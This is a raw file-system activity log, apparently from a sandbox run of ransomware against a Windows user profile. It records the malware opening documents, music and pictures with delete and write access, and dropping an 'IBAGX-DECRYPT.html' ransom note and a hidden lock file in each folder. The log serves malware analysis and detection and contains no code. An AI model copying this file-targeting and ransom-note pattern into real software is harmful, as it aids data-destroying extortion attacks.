Create C:\Users\EEBsYm5\Documents\W7N38.xlsx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\WrUqIkCs3GuozHaQ.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\Ylbgmh.rtf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\Zx8WCNwNF.xlsx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Downloads\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Downloads\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Favorites\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Favorites\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Favorites\Links\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Favorites\Links\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Favorites\Links\Suggested Sites.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Favorites\Links\Web Slice Gallery.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Favorites\Microsoft Websites\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Favorites\Microsoft Websites\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Favorites\Microsoft Websites\IE Add-on site.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Favorites\Microsoft Websites\IE site on Microsoft.com.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Favorites\Microsoft Websites\Microsoft At Home.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Favorites\Microsoft Websites\Microsoft At Work.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Favorites\Microsoft Websites\Microsoft Store.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Favorites\MSN Websites\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Favorites\MSN Websites\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Favorites\MSN Websites\MSN Autos.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Favorites\MSN Websites\MSN Entertainment.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Favorites\MSN Websites\MSN Money.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Favorites\MSN Websites\MSN Sports.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Favorites\MSN Websites\MSN.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Favorites\MSN Websites\MSNBC News.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Favorites\Windows Live\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Favorites\Windows Live\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Favorites\Windows Live\Get Windows Live.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Favorites\Windows Live\Windows Live Gallery.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Favorites\Windows Live\Windows Live Mail.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Favorites\Windows Live\Windows Live Spaces.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Links\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Links\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Music\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Create C:\Users\EEBsYm5\Music\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Music\1clk8BgFbf.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\1lo1GtA8GFvRuHz.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\22MyRIDfUo1qSoC.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\5ApAoCcu2jJhVO5.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\5gVMkaJs ibQzS.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\5x-bv.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\9pAbBkcV.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\a--MFAm_t-fpxqDUSe.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\Ad2zgxFM7D4h jW.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\CvVDCQ4.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\eBVw6jtogO8G1fQLGtj7.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\etqaW8wTJ.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\FNnXsm7O.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\hAL hb0zqRl.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\I IgsIteQN.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\IDxNW.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\jNVEPWEJEyJq6sE.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\KjQXOL.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\kUjbWE9.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\L1fx0Un-X3sclNImngmu.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\lZFBHUeX4nu.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\mNs1b.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\Mq1_G_RX.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\MW23I.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\myb1sdd-QS4.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\ONx7q7EpAOg6j8q ByII.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\qcPYkin0Y3tGsT.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\qfL0fy4yD3aPZbri.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\qR8HudK2HC6.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\RXbudzWkd5d9xwtGA16l.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\r_I0tn7ofDKw0VRb.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\tLlcqTPAaClbgBB0m.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\VvcatQI4A1KfH_.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\xLoVG6.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\zdClr.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\ZIBpI.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Music\ZQOduxGBGW8SL5.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\My Documents\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Create C:\Users\EEBsYm5\My Documents\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\NetHood\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\NetHood\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\ntuser.dat.LOG1 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Create C:\Users\EEBsYm5\ntuser.dat.LOG1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Create C:\Users\EEBsYm5\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Create C:\Users\EEBsYm5\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Create C:\Users\EEBsYm5\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Create C:\Users\EEBsYm5\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Create C:\Users\EEBsYm5\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Create C:\Users\EEBsYm5\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Create C:\Users\EEBsYm5\ntuser.ini desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Create C:\Users\EEBsYm5\Pictures\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Pictures\ACgwvOZXASKlyQamj\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Pictures\ACgwvOZXASKlyQamj\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Pictures\ACgwvOZXASKlyQamj\NkhIDC5Kmgg_.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\ACgwvOZXASKlyQamj\VJJtBzDiYRrBpJk3 r.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\ACgwvOZXASKlyQamj\Y-fyGuSNnLyiDtmITP.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\CGotBO1gSZg.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\DT4z6UgyBbU9mK.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\fBAMY6.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\fI4XJw\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Pictures\fI4XJw\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Pictures\fI4XJw\1hgxz0LP1Cj6c6ELia.gif desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\fI4XJw\EouGYZiLKPABQOfe6izO.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\fI4XJw\liL-2aFkdyFeP8Iu.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\fI4XJw\oVNuE5Qodb.bmp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\fI4XJw\QjdaI.gif desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\fxHP2HyAX\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Pictures\fxHP2HyAX\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Pictures\fxHP2HyAX\5cDaMBp--aSZV.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\fxHP2HyAX\8gFK4sK4tmbCH c-wZHv.bmp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\jk7SZg7LN.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\jS-G\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Pictures\jS-G\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Pictures\jS-G\DSEf.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\jS-G\SFGOzroeE trxNF.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\jS-G\WSj4Brk__SjKLB\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Pictures\jS-G\WSj4Brk__SjKLB\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Pictures\jS-G\WSj4Brk__SjKLB\Gu_al_h0.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\jS-G\WSj4Brk__SjKLB\io6hmA.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\jS-G\WSj4Brk__SjKLB\KpMZTyQuuYTWlc89.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\jS-G\WSj4Brk__SjKLB\yju6YBbBBQWAoJum9O.bmp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\jS-G\Y 71Hd.gif desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\_n8q\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Pictures\_n8q\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Pictures\_n8q\4q7dnEiys2AWKFFO.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\_n8q\eREUpw9weZ u.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\_n8q\hyurBXWwCetuTWykO.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\_n8q\kijng19PrCBlk1.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\_n8q\opLEw9.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Pictures\_n8q\XsDydiAZMF6Gx.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
